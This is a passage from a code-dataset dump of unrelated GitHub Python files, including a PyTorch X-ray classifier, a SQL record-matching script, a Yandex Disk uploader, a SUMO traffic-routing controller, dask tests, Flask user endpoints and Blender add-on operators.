stride=2,\n padding=0)\n\n self.block3 = BasicConvBlock(256)\n self.conv_pool3 = nn.Conv2d(512, 512, kernel_size=2, stride=2,\n padding=0)\n self.attn2 = SelfAttentionModule(512)\n\n # self.semi_final = nn.Conv2d(128, 1, kernel_size=1)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.final = nn.Linear(512, 2)\n\n def forward(self, x):\n x = F.relu(self.init_layer(x))\n x = self.block1(x)\n x = self.conv_pool1(x)\n # x = self.attn1(x)\n x = self.block2(x)\n x = self.conv_pool2(x)\n x = self.block3(x)\n x = self.conv_pool3(x)\n # x, attn_map = self.attn2(x)\n # x = F.relu(self.semi_final(x))\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n out = self.final(x)\n return out\n\n\nclass BasicConvBlock(nn.Module):\n def __init__(self, in_channels):\n super(BasicConvBlock, self).__init__()\n self.bn = nn.BatchNorm2d(in_channels*2, in_channels*2)\n self.convLayer1 = nn.Conv2d(in_channels, in_channels*2, kernel_size=3,\n stride=1, padding=1)\n self.convLayer2 = nn.Conv2d(in_channels*2, in_channels*2,\n kernel_size=3,\n stride=1, padding=1)\n self.convLayer3 = nn.Conv2d(in_channels*2, in_channels*2,\n kernel_size=3,\n stride=1, padding=1)\n\n def forward(self, x):\n x = F.relu(self.bn(self.convLayer1(x)))\n out = F.relu(self.bn(self.convLayer2(x)))\n out = 
F.relu(self.bn(self.convLayer3(out)))\n        out = out + x\n        return out\n","repo_name":"abhinavdhere/covid19_xray","sub_path":"exp_models.py","file_name":"exp_models.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"11055785217","text":"from pysql import DB_CONFIG, DB_commands, get_command, ex\n\n\n\n\ndef match_post_user():\n    comm_post = \"SELECT * FROM post\"\n    res_post = ex(DB_CONFIG, comm_post, 'v')\n    for i in res_post:\n        user_id_temp=i[-2]\n        if i[0]!='c25f0014-47ed-4db4-aaab-23c0ca8af4d2':\n            comm_user= \"SELECT * FROM users WHERE user_id_temp=%s\" % \"'\" + user_id_temp + \"'\"\n            res_user = ex(DB_CONFIG, comm_user, 'v')\n            for j in res_user:\n                comm_update = \"UPDATE post SET user_id = %s WHERE user_id_temp =%s\" % (\"'\" +j[0]+ \"'\",\"'\" + user_id_temp + \"'\")\n                ex(DB_CONFIG, comm_update)\n\ndef match_post_comment():\n    comm_post = \"SELECT * FROM post\"\n    res_post = ex(DB_CONFIG, comm_post, 'v')\n    for i in res_post:\n        id_post=i[0]\n        id_post_temp=i[-1]\n        comm_comments= \"UPDATE comment SET post_id= %s WHERE post_id_temp=%s\" % (\"'\" +id_post+ \"'\",\"'\" + id_post_temp + \"'\")\n        ex(DB_CONFIG, comm_comments)\n\n\ndef match_post_member():\n    comm_user = \"SELECT * FROM users\"\n    res_user = ex(DB_CONFIG, comm_user, 'v')\n    for i in res_user:\n        if i[-1] is not None:\n            id_user=i[0]\n            id_user_temp=i[-1]\n            comm_comments= \"UPDATE post SET user_id= %s WHERE user_id_temp=%s\" % (\"'\" +id_user+ \"'\",\"'\" + id_user_temp + \"'\")\n            ex(DB_CONFIG, comm_comments)\n\ndef match_post_group():\n    comm_post = \"SELECT * FROM post\"\n    res_post = ex(DB_CONFIG, comm_post, 'v')\n    for i in res_post:\n        gr_id_temp=i[-3]\n        comm_groups = \"SELECT * FROM groups WHERE group_id_temp=%s\" % \"'\" +gr_id_temp+ \"'\"\n        res_groups = ex(DB_CONFIG, comm_groups, 'v')\n        for t in res_groups:\n            comm_post_upd= \"UPDATE post SET group_id= %s WHERE group_id_temp=%s\" % (\"'\" +t[0]+ \"'\",\"'\" + gr_id_temp + \"'\")\n            ex(DB_CONFIG, comm_post_upd)\n\ndef match_group_owner():\n    comm_group_owner = \"select * from group_member where administrator = True\"\n    res_g_o = ex(DB_CONFIG, comm_group_owner, 'v')\n    for i in res_g_o:\n        gr_id=i[0]\n        adm_id=i[1]\n        comm_group_upd = \"UPDATE groups SET owner_id= %s WHERE id=%s\" % (\"'\" + adm_id + \"'\", \"'\" + gr_id + \"'\")\n        ex(DB_CONFIG, comm_group_upd)\n\n\ndef match_file_owner():\n    comm_post= \"select * from post\"\n    res_comm_post= ex(DB_CONFIG, comm_post, 'v')\n    for i in res_comm_post:\n        id_post_temp=i[-1]\n        id_user=i[2]\n        print(id_post_temp)\n        print(id_user)\n        comm_file_upd = \"UPDATE file SET owner_id= %s WHERE post_id_temp=%s\" % (\"'\" + id_user + \"'\", \"'\" + id_post_temp + \"'\")\n        print(comm_file_upd)\n\n\n\n\n\n\n\n\n\n#match_post_comment()\n#match_post_user()\n#match_post_member()\n#match_post_group()\n#match_group_owner()\n#match_file_owner()","repo_name":"AlexVepr12/workspace","sub_path":"matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"71048721707","text":"import requests\nimport os\n\n\ntoken=input('Введите токен: ')\nfile_directory=input('Введите путь до файла на компьютере: ')\n\nHEADERS = {'Authorization': f'OAuth {token}'}\n\nclass YaUploader:\n    def __init__(self, token: str):\n        self.token = token\n\n    def upload(self, file_path: str):\n        self.file_path = file_directory\n        step1 = 
requests.get('https://cloud-api.yandex.net/v1/disk/resources/upload', \n                             params={'path' : os.path.basename(file_directory), 'overwrite' : 'true'},\n                             headers=HEADERS) \n        step1 = step1.json()\n        href = step1['href']\n        with open(file_directory, 'rb') as f:\n            step2 = requests.put(href, files={'file': f})\n        if step2.status_code == 201:\n            print('Файл успешно загружен')\n        else:\n            print('Что-то пошло не так') \n\nif __name__ == '__main__':\n    uploader = YaUploader(token)\n    result = uploader.upload(file_directory)\n    \n\n\n","repo_name":"German200597/yandex","sub_path":"yandex_api.py","file_name":"yandex_api.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18302257951","text":"from abc import ABC, abstractmethod\nfrom operator import le\nimport random\nimport os\nimport sys\nimport copy\nfrom core.Util import *\nif 'SUMO_HOME' in os.environ:\n    tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\n    sys.path.append(tools)\nelse:\n    sys.exit(\"No environment variable SUMO_HOME!\")\nimport traci\nimport sumolib\n\nSTRAIGHT = \"s\"\nTURN_AROUND = \"t\"\nLEFT = \"l\"\nRIGHT = \"r\"\nSLIGHT_LEFT = \"L\"\nSLIGHT_RIGHT = \"R\"\n\nclass RouteController(ABC):\n    \"\"\"\n    Base class for routing policy\n\n    To implement a scheduling algorithm, implement the make_decisions() method.\n    Please use the boilerplate code from the example, and implement your algorithm between\n    the 'Your algo...' comments.\n\n    make_decisions takes in a list of vehicles and network information (connection_info).\n    Using this data, it should return a dictionary of {vehicle_id: decision}, where \"decision\"\n    is one of the directions defined by SUMO (see constants above). Any scheduling algorithm\n    may be injected into the simulation, as long as it is wrapped by the RouteController class\n    and implements the make_decisions method.\n\n    :param connection_info: object containing network information, including:\n        - out_going_edges_dict {edge_id: {direction: out_edge}}\n        - edge_length_dict {edge_id: edge_length}\n        - edge_index_dict {edge_index_dict} keep track of edge ids by an index\n        - edge_vehicle_count {edge_id: number of vehicles at edge}\n        - edge_list [edge_id]\n\n    \"\"\"\n    def __init__(self, connection_info: ConnectionInfo):\n        self.connection_info = connection_info\n        self.direction_choices = [STRAIGHT, TURN_AROUND, SLIGHT_RIGHT, RIGHT, SLIGHT_LEFT, LEFT]\n\n    ''' When testing, the vehicle's current speed always reads 0 for some reason, so we assume that path_length can never exceed 20,\n    because that is the bound used in the while loop below.\n    \n    This means that if the first choice given to compute_local_target is longer than 20, it will disregard the other choices and go with that one,\n    or with the combination of all the paths whose total length is less than 20.'''\n    def compute_local_target(self, decision_list, vehicle):\n        current_target_edge = vehicle.current_edge\n        try:\n            path_length = 0\n            i = 0\n            #print(\"\ninside compute_local_target - vehicle current speed: {}\".format(vehicle.current_speed))\n            # the while loop makes sure the vehicle will not assume it has arrived at its destination because the target edge is too short.\n            while path_length <= max(vehicle.current_speed, 20):\n                \n                if current_target_edge == vehicle.destination:\n                    break\n                if i >= len(decision_list):\n                    #print(\"Throwing userwarning, i:{} - len(decision_list):{}\".format(i, len(decision_list)))\n                    raise UserWarning(\n                        \"Not enough decisions provided to compute valid local target. 
TRACI will remove vehicle.\"\n )\n\n choice = decision_list[i]\n if choice not in self.connection_info.outgoing_edges_dict[current_target_edge]:\n raise UserWarning(\n \"Invalid direction. TRACI will remove vehicle.\"\n )\n current_target_edge = self.connection_info.outgoing_edges_dict[current_target_edge][choice]\n path_length += self.connection_info.edge_length_dict[current_target_edge]\n #print(\"current_target_edge1:{}\".format(current_target_edge))\n #print(\"Current edge length:{} - path_length:{}\".format(self.connection_info.edge_length_dict[current_target_edge], path_length))\n\n if i > 0:\n if decision_list[i - 1] == decision_list[i] and decision_list[i] == 't':\n # stuck in a turnaround loop, let TRACI remove vehicle\n #print(\"current_target_edge2:{}\".format(current_target_edge))\n return current_target_edge\n\n i += 1\n\n except UserWarning as warning:\n print(warning)\n\n return current_target_edge\n\n\n @abstractmethod\n def make_decisions(self, vehicles, connection_info):\n pass\n\n\nclass RandomPolicy(RouteController):\n \"\"\"\n Example class for a custom scheduling algorithm.\n Utilizes a random decision policy until vehicle destination is within reach,\n then targets the vehicle destination.\n \"\"\"\n def __init__(self, connection_info):\n super().__init__(connection_info)\n\n def make_decisions(self, vehicles, connection_info):\n \"\"\"\n A custom scheduling algorithm can be written in between the 'Your algo...' comments.\n -For each car in the vehicle batch, your algorithm should provide a list of future decisions.\n -Sometimes short paths result in the vehicle reaching its local TRACI destination before reaching its\n true global destination. In order to counteract this, ask for a list of decisions rather than just one.\n -This list of decisions is sent to a function that returns the 'closest viable target' edge\n reachable by the decisions - it is not the case that all decisions will always be consumed.\n As soon as there is enough distance between the current edge and the target edge, the compute_target_edge\n function will return.\n -The 'closest viable edge' is a local target that is used by TRACI to control vehicles\n -The closest viable edge should always be far enough away to ensure that the vehicle is not removed\n from the simulation by TRACI before the vehicle reaches its true destination\n\n :param vehicles: list of vehicles to make routing decisions for\n :param connection_info: object containing network information\n :return: local_targets: {vehicle_id, target_edge}, where target_edge is a local target to send to TRACI\n \"\"\"\n\n local_targets = {}\n for vehicle in vehicles:\n start_edge = vehicle.current_edge\n print(\"{}: current - {}, destination - {}, deadline - {}\".format(vehicle.vehicle_id, vehicle.current_edge, vehicle.destination, vehicle.deadline))\n '''\n Your algo starts here\n '''\n decision_list = []\n\n i = 0\n while i < 10: # choose the number of decisions to make in advanced; depends on the algorithm and network\n choice = self.direction_choices[random.randint(0, 5)] # 6 choices available in total\n\n # dead end\n if len(self.connection_info.outgoing_edges_dict[start_edge].keys()) == 0:\n break\n\n # make sure to check if it's a valid edge\n if choice in self.connection_info.outgoing_edges_dict[start_edge].keys():\n decision_list.append(choice)\n start_edge = self.connection_info.outgoing_edges_dict[start_edge][choice]\n\n if i > 0:\n if decision_list[i-1] == decision_list[i] and decision_list[i] == 't':\n # stuck in a turnaround 
loop, let TRACI remove vehicle\n break\n\n i += 1\n\n '''\n Your algo ends here\n '''\n x = self.compute_local_target(decision_list, vehicle)\n print(\"compute_local_target returns:{} - with decision list:{}\".format(x, decision_list))\n local_targets[vehicle.vehicle_id] = x\n\n # for vehicle in vehicles:\n # current_edge = vehicle.current_edge\n # if current_edge not in self.connection_info.outgoing_edges_dict.keys():\n # continue\n # for direction, outgoing_edge in self.connection_info.outgoing_edges_dict[current_edge].items():\n # print(\"Current vehicle: {}\".format(vehicle.vehicle_id))\n # print(\"current edge: {} - direction: {} - edge:{}\".format(current_edge,direction, outgoing_edge))\n # print(\"Vehicles on the potential edge: {}\".format(self.connection_info.edge_vehicle_count[outgoing_edge]))\n # print(\"\\n\")\n\n return local_targets\n\n\nclass NathanPolicy(RouteController):\n def __init__(self, connection_info):\n super().__init__(connection_info)\n \n def make_decisions(self, vehicles, connection_info):\n \"\"\"\n :param vehicles: list of vehicles to make routing decisions for\n :param connection_info: object containing network information\n :return: local_targets: {vehicle_id, target_edge}, where target_edge is a local target to send to TRACI\n \"\"\"\n local_targets = {}\n\n if len(vehicles) == 0:\n return local_targets\n\n\n # create edge_vehicle { edge_id : [vehicle OBJECT]} to keep track of all the vehicles that on the same edge\n edge_vehicle = {}\n for vehicle in vehicles:\n if vehicle.current_edge not in self.connection_info.outgoing_edges_dict.keys():\n continue\n if vehicle.current_edge in edge_vehicle:\n edge_vehicle[vehicle.current_edge].append(vehicle)\n else:\n edge_vehicle[vehicle.current_edge] = list()\n edge_vehicle[vehicle.current_edge].append(vehicle)\n # sort all vehicles by their deadline in edge_vehicles values \n for edge, v_list in edge_vehicle.items():\n v_list.sort(key=lambda x: x.deadline)\n\n\n #create vehicle_decisionList {vehicle OBJECT : [decision list]} because instead of sending decision list to the\n #local target we wait to check for congestion\n vehicle_decisionList = {}\n for edge, vehicles in edge_vehicle.items():\n for vehicle in vehicles:\n #instantiate a list of decision for each vehicle\n vehicle_decisionList[vehicle] = list()\n\n # --- start dijkstra ---\n # apply dijkstra to each vehicle in edge_vehicle DS\n for edge, vehicles in edge_vehicle.items():\n #below is copied from dijkstra \n for vehicle in vehicles:\n #print(\"---------------------------\")\n #print(\"{}: current - {}, destination - {}\".format(vehicle.vehicle_id, vehicle.current_edge, vehicle.destination))\n decision_list = []\n unvisited = {edge: 1000000000 for edge in self.connection_info.edge_list} # map of unvisited edges {edge_id : distance}\n visited = {} # map of visited edges\n current_edge = vehicle.current_edge\n #print(\"vehicle current_edge length:{}\".format(self.connection_info.edge_length_dict[current_edge]))\n\n #print(\"\\n------- getting into while loop ----------\\n\")\n #vehicle is at the beginning of the edge so current edge length counts too\n current_distance = self.connection_info.edge_length_dict[current_edge]\n unvisited[current_edge] = current_distance\n #stores shortest path to each edge using directions [edge_id]\n path_lists = {edge: [] for edge in self.connection_info.edge_list} \n \n while True:\n if current_edge not in self.connection_info.outgoing_edges_dict.keys():\n continue\n for direction, outgoing_edge in 
self.connection_info.outgoing_edges_dict[current_edge].items():\n #print(\"----- in for loop -----\")\n if outgoing_edge not in unvisited:\n continue\n edge_length = self.connection_info.edge_length_dict[outgoing_edge]\n new_distance = current_distance + edge_length\n #univisited length are set to 100000 so this is almost always true \n if new_distance < unvisited[outgoing_edge]:\n '''\n print(\"\\nchecking direction:{} - edge:{}\".format(direction, outgoing_edge))\n print(\"new distance < outgoing_edge length\")\n print(\"new_distance = current_distance + edge_length = {}\".format(new_distance))\n print(\"unvisited[outgoing_edge]: {}\".format(unvisited[outgoing_edge]))\n '''\n #distance to get to this 'outgoing_edge' is now 'new_distance'\n unvisited[outgoing_edge] = new_distance\n\n #path_list[current_edge] is initially set to empty array\n #so we assgin current_path to that empty array so we can modify it\n current_path = copy.deepcopy(path_lists[current_edge])\n \n #append this new shortest path to current_edge; example: path_list[E9] = [s , l , s , r] \n #[s, l , s , r] is current_path\n current_path.append(direction)\n # reassign path_list[E9] to current path [s,l,s,r]\n path_lists[outgoing_edge] = copy.deepcopy(current_path)\n #print(\"current path_list[{}]:{}\".format(outgoing_edge, path_lists[outgoing_edge]))\n # NOT nathan print(\"{} + {} : {} + {}\".format(path_lists[current_edge], direction, path_edge_lists[current_edge], outgoing_edge))\n #print(\"---- out for loop ----\")\n visited[current_edge] = current_distance\n del unvisited[current_edge]\n if not unvisited:\n break\n if current_edge==vehicle.destination:\n break\n #update possible_edge every time we modify - del unvisited above\n possible_edges = [edge for edge in unvisited.items() if edge[1]]\n\n #sort by x[1] meaning distance, and [0] meaning we take the smallest distance\n #and set our current_edge to that value\n current_edge, current_distance = sorted(possible_edges, key=lambda x: x[1])[0]\n '''\n print(\"\\npossible edge:{}\".format(possible_edges))\n print(\"\\ncurrent_edge:{}\".format(current_edge))\n print(\"current_edge length:{}\".format(self.connection_info.edge_length_dict[current_edge]))\n print(\"current_distance:{}\".format(current_distance))\n print(\"\\n ---------- repeating while loop ----------------\\n\")\n #print('{}:{}------------'.format(current_edge, current_distance))\n '''\n #current_edge = vehicle.current_edge - not NATHAN\n #print(\"\\nout of while true loop -----\")\n #print(\"\\npath_list:{}\".format(path_lists))\n for direction in path_lists[vehicle.destination]:\n decision_list.append(direction)\n #print(\"\\ndecision_list:{}\".format(decision_list))\n vehicle_decisionList[vehicle] = decision_list\n\n #----- outside dijkstra method------\n # print(\"\\n ---- testing vehicle and destination list:\")\n # for vehicle, decisionList in vehicle_decisionList.items():\n # print(\"vehicle:{} - decision_list:{}\".format(vehicle.vehicle_id, decisionList))\n\n '''\n check if route vehicle is gonna take is full ( count > 2)\n\n if yes then create a dict outEdge_count {direction : count}\n then sort by count on that dict \n then send the lowest one to decision list \n and append that to local target\n\n if no, then append like dijkstra would have \n '''\n for vehicle, decision_list in vehicle_decisionList.items():\n if len(decision_list) == 0:\n local_targets[vehicle.vehicle_id] = self.compute_local_target(decision_list, vehicle)\n continue \n #the next 3 lines is used to check if vehicle next item is 
its destination, then we don't need to do any work on it\n            direction_first_item_in_decision_list = decision_list[0]\n            edge_first_item_in_decision_list = self.connection_info.outgoing_edges_dict[vehicle.current_edge][direction_first_item_in_decision_list]\n            if edge_first_item_in_decision_list == vehicle.destination:\n                local_targets[vehicle.vehicle_id] = self.compute_local_target(decision_list, vehicle)\n                continue\n\n            #getting the next edge id \n            nextEdge_id = self.connection_info.outgoing_edges_dict[vehicle.current_edge][decision_list[0]]\n            choices_available = len(self.connection_info.outgoing_edges_dict[vehicle.current_edge])\n            #if the next edge on the vehicle's route is too crowded (>= 10 vehicles) and there are other choices available, then we re-route the vehicle\n            if self.connection_info.edge_vehicle_count[nextEdge_id] >= 10 and choices_available > 1 and len(decision_list) > 4:\n                #gather all the choices available and send the vehicle toward the least-crowded choice\n                outEdgeDirection_count = {}\n                #explore all the routes available to the vehicle in outgoing_edges_dict\n                for direction, outEdge_id in self.connection_info.outgoing_edges_dict[vehicle.current_edge].items():\n                    #if the 'possible' edge that we are sending the vehicle to is a dead end (no routes available in outgoing_edge)\n                    # then we don't add it (meaning if len is not 0 then we add)\n                    if len(self.connection_info.outgoing_edges_dict[outEdge_id].items()) != 0:\n                        outEdgeDirection_count[direction] = self.connection_info.edge_vehicle_count[outEdge_id]\n                outEdgeDirection_count = dict(sorted(outEdgeDirection_count.items(), key=lambda item: item[1]))\n\n                \n                # test sort\n                #print(\"\n-- testing outEdge_count sort:{}\n\".format(outEdge_count))\n                new_list = list()\n                new_list.append(list(outEdgeDirection_count.keys())[0])\n                # print(\"\nold_list:{}\".format(decision_list))\n                # print(\"\nnew list:{}\".format(new_list))\n                local_targets[vehicle.vehicle_id] = self.compute_local_target(new_list, vehicle)\n\n            else:\n                local_targets[vehicle.vehicle_id] = self.compute_local_target(decision_list, vehicle)\n        # print(\"------\nlocal_targets:{}\".format(local_targets))\n        return local_targets ","repo_name":"nathanguyenn/STR_Nathan_Nguyen","sub_path":"Selfless-Traffic-Routing-Testbed/controller/RouteController.py","file_name":"RouteController.py","file_ext":"py","file_size_in_byte":18855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"33759673048","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    @Time    : 2020-09-26 16:30\n    @Author  : QDY\n    @FileName: 1590. 
使数组和能被 P 整除.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n给你一个正整数数组nums,请你移除 最短子数组(可以为 空),使得剩余元素的 和能被 p整除。 不允许将整个数组都移除。\n请你返回你需要移除的最短子数组的长度,如果无法满足题目要求,返回 -1。\n子数组定义为原数组中连续的一组元素。\n\n示例 1:\n输入:nums = [3,1,4,2], p = 6\n输出:1\n解释:nums 中元素和为 10,不能被 p 整除。我们可以移除子数组 [4] ,剩余元素的和为 6 。\n\n示例 2:\n输入:nums = [6,3,5,2], p = 9\n输出:2\n解释:我们无法移除任何一个元素使得和被 9 整除,最优方案是移除子数组 [5,2] ,剩余元素为 [6,3],和为 9 。\n\n示例3:\n输入:nums = [1,2,3], p = 3\n输出:0\n解释:和恰好为 6 ,已经能被 3 整除了。所以我们不需要移除任何元素。\n\n示例 4:\n输入:nums = [1,2,3], p = 7\n输出:-1\n解释:没有任何方案使得移除子数组后剩余元素的和被 7 整除。\n\n示例 5:\n输入:nums = [1000000000,1000000000,1000000000], p = 3\n输出:0\n\n提示:\n1 <= nums.length <= 105\n1 <= nums[i] <= 109\n1 <= p <= 109\n\"\"\"\n\n\nclass Solution:\n def minSubarray(self, nums, p: int) -> int:\n mod = sum(nums) % p\n if mod == 0: return 0\n N = len(nums)\n prefix, res = 0, float('inf')\n remainder = {0: -1} # 记录前缀和的余数最后出现的id\n # for i in range(N): # 找余数为mod的最短子数组\n # prefix += nums[i]\n # r = prefix % p\n # remainder[r] = i\n # if r < mod and r-mod+p in remainder:\n # # 若nums[:j+1]的和的余数=r-mod+p,则nums[j+1:i+1]的和的余数为mod\n # res = min(res, i - remainder[r-mod+p])\n # elif r >= mod and r-mod in remainder:\n # # 若nums[:j+1]的和的余数=r-mod,则nums[j+1:i+1]的和的余数为mod\n # res = min(res, i - remainder[r-mod])\n for i in range(N):\n prefix = (prefix + nums[i]) % p\n remainder[prefix] = i\n r = (prefix - mod) % p\n if r in remainder:\n res = min(res, i - remainder[r])\n return res if res < N else -1\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/1590. 使数组和能被 P 整除.py","file_name":"1590. 使数组和能被 P 整除.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18302257951","text":"import turtle\n\ns = turtle.getscreen()\nt = turtle.Turtle()\n\n\"\"\"\nseeing if you did two three digit numbers\n\"\"\"\n\nfor x in range(6):\n base_length = 50\n length = base_length * 2\n \n t.right(200)\n t.forward(base_length)\n \n t.right(100)\n t.forward(length)","repo_name":"GmanRiff/Learning_With_Turtle","sub_path":"Turtle_Practice_01.py","file_name":"Turtle_Practice_01.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1327830613","text":"import turtle as t\n\n\ndef t1():\n \"\"\"绘制多个同切圆\"\"\"\n for i in range(4):\n t.pensize(i**2)\n t.circle(20*i)\n t.pencolor('red')\n t.done()\n\n\ndef t2():\n \"\"\"绘制五角星\"\"\"\n t.pu()\n t.bk(100)\n t.pd()\n t.color('red', 'red')\n t.begin_fill()\n for i in range(5):\n t.fd(200)\n t.rt(144)\n # t.right(144) # 两个right 就是五边形\n t.end_fill()\n t.done()\n\n\ndef t3():\n t.pu()\n t.fd(-100)\n t.pd()\n t.pencolor(\"red\")\n for i in range(3):\n t.circle(-90, 90)\n t.circle(90, -90)\n t.done()\n t.fd(100)\n\n\nif __name__ == '__main__':\n # t1()\n # t2()\n t3()","repo_name":"kekeFu/Python2020","sub_path":"test_8_graph/_2_circle.py","file_name":"_2_circle.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28518904754","text":"from multiprocessing.pool import ThreadPool\nimport threading\nfrom threading import Thread\nfrom time import time, sleep\n\nimport pytest\n\nfrom dask.context import set_options\nfrom dask.threaded import get\nfrom dask.utils_test import inc, add\n\n\ndef test_get():\n dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}\n assert get(dsk, 'w') == 4\n assert get(dsk, ['w', 'z']) == (4, 2)\n\n\ndef test_nested_get():\n dsk = 
{'x': 1, 'y': 2, 'a': (add, 'x', 'y'), 'b': (sum, ['x', 'y'])}\n assert get(dsk, ['a', 'b']) == (3, 3)\n\n\ndef test_get_without_computation():\n dsk = {'x': 1}\n assert get(dsk, 'x') == 1\n\n\ndef bad(x):\n raise ValueError()\n\n\ndef test_exceptions_rise_to_top():\n dsk = {'x': 1, 'y': (bad, 'x')}\n pytest.raises(ValueError, lambda: get(dsk, 'y'))\n\n\ndef test_reuse_pool():\n pool = ThreadPool()\n with set_options(pool=pool):\n assert get({'x': (inc, 1)}, 'x') == 2\n assert get({'x': (inc, 1)}, 'x') == 2\n\n\ndef test_threaded_within_thread():\n L = []\n\n def f(i):\n result = get({'x': (lambda: i,)}, 'x', num_workers=2)\n L.append(result)\n\n before = threading.active_count()\n\n for i in range(20):\n t = Thread(target=f, args=(1,))\n t.daemon = True\n t.start()\n t.join()\n assert L == [1]\n del L[:]\n\n start = time() # wait for most threads to join\n while threading.active_count() > before + 10:\n sleep(0.01)\n assert time() < start + 5\n\n\ndef test_dont_spawn_too_many_threads():\n before = threading.active_count()\n\n dsk = {('x', i): (lambda: i,) for i in range(10)}\n dsk['x'] = (sum, list(dsk))\n for i in range(20):\n get(dsk, 'x', num_workers=4)\n\n after = threading.active_count()\n\n assert after <= before + 8\n\n\ndef test_thread_safety():\n def f(x):\n return 1\n\n dsk = {'x': (sleep, 0.05), 'y': (f, 'x')}\n\n L = []\n\n def test_f():\n L.append(get(dsk, 'y'))\n\n threads = []\n for i in range(20):\n t = Thread(target=test_f)\n t.daemon = True\n t.start()\n threads.append(t)\n\n for thread in threads:\n thread.join()\n\n assert L == [1] * 20\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/dask/tests/test_threaded.py","file_name":"test_threaded.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"70321263467","text":"from flask import Blueprint, request, jsonify, g\nfrom forms.user import UserCreateForm\nfrom models.user import User\nfrom app import jwt\nfrom libraries.authentification import login_required\nfrom .chat import connected_users\nfrom underscore import _\n\nuser_view = Blueprint('user_view', __name__)\n\n\n@user_view.route('/user', methods=['POST'])\ndef create():\n form = UserCreateForm.from_json(request.get_json())\n\n if not form.validate():\n return jsonify(form.errors), 400\n\n user = User()\n user.email = form.data.get('email')\n user.first_name = form.data.get('first_name')\n user.last_name = form.data.get('last_name')\n user.avatar = form.data.get('avatar', None)\n user.password = User.make_password(form.data.get('password'))\n user.save()\n\n access_token = jwt.jwt_encode_callback(user)\n\n return jsonify({'user': user.serialize(), 'access_token': access_token.decode('utf-8')}), 200\n\n\n@user_view.route('/user/list', methods=['GET'])\n@login_required()\ndef list():\n users = User.where('id', '!=', g.user['id']).get().serialize()\n\n for user in users:\n client = _.findWhere(connected_users, {'id': user['id']})\n user['online'] = True if client else False\n user['username'] = \"%s %s\" % (user['first_name'],user['last_name'])\n\n\n return jsonify(users), 200\n\n\n@user_view.route('/user/', methods=['GET'])\n@login_required()\ndef user(id):\n user = User.find(id)\n if not user:\n return jsonify({}), 404\n\n return jsonify(user.serialize()), 
200\n","repo_name":"andriy-sa/Andy-Chat","sub_path":"views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"40835715357","text":"import bpy\nfrom bpy.types import Operator\nfrom bpy.props import StringProperty, IntProperty\nfrom ..blocks.block_data import UI_Block\nfrom ..io import save_actual_ui_state\nfrom ... import __package__ as main_package\n\n\nclass BAS_OT_clear_custom_ui(Operator):\n bl_idname = \"bas.clear_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Clear Custom UI\"\n def execute(self, context):\n UI_Block.clear()\n self.report({'INFO'}, \"Preset has been cleared\")\n return {'FINISHED'}\n\nclass BAS_OT_remove_custom_ui(Operator):\n bl_idname = 'bas.remove_custom_ui_preset'\n bl_label = \"\"\n bl_description = \"Remove Custom UI\"\n def execute(self, context):\n from ..io import remove_custom_ui\n remove_custom_ui(context)\n self.report({'INFO'}, \"Preset has been removed\")\n return {'FINISHED'}\n\nclass BAS_OT_create_custom_ui_preset(Operator):\n bl_idname = \"bas.create_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Create Custom UI Preset\"\n\n name : StringProperty(default=\"My preset\", name=\"Preset Name\")\n\n def execute(self, context):\n if self.name == '' or self.name == ' ':\n self.report({'ERROR'}, \"Preset name is invalid\")\n return {'CANCELLED'}\n from ..io import create_custom_ui_preset\n if not create_custom_ui_preset(context, self.name):\n self.report({'ERROR'}, \"Couldn't create new preset!\")\n return {'CANCELLED'}\n self.report({'INFO'}, \"Preset %s has been created\" % self.name)\n return {'FINISHED'}\n\n def invoke(self, context, event):\n wm = context.window_manager\n return wm.invoke_props_dialog(self)\n\n\nclass BAS_OT_duplicate_custom_ui_preset(Operator):\n bl_idname = \"bas.duplicate_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Duplicate Custom UI Preset\"\n\n def execute(self, context):\n from ..io import duplicate_custom_ui_preset\n if not duplicate_custom_ui_preset(context):\n self.report({'ERROR'}, \"Couldn't duplicate active preset!\")\n return {'CANCELLED'}\n return {'FINISHED'}\n\n\nclass BAS_OT_reset_custom_ui_preset(Operator):\n bl_idname = \"bas.reset_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Reset Custom UI Preset\"\n\n def execute(self, context):\n from ..io import reset_custom_ui_preset\n if not reset_custom_ui_preset(context):\n self.report({'ERROR'}, \"Couldn't reset active preset!\")\n return {'CANCELLED'}\n self.report({'INFO'}, \"Preset has been reset\")\n return {'FINISHED'}\n\n\nclasses = [\n BAS_OT_create_custom_ui_preset,\n BAS_OT_duplicate_custom_ui_preset,\n BAS_OT_reset_custom_ui_preset,\n BAS_OT_clear_custom_ui,\n 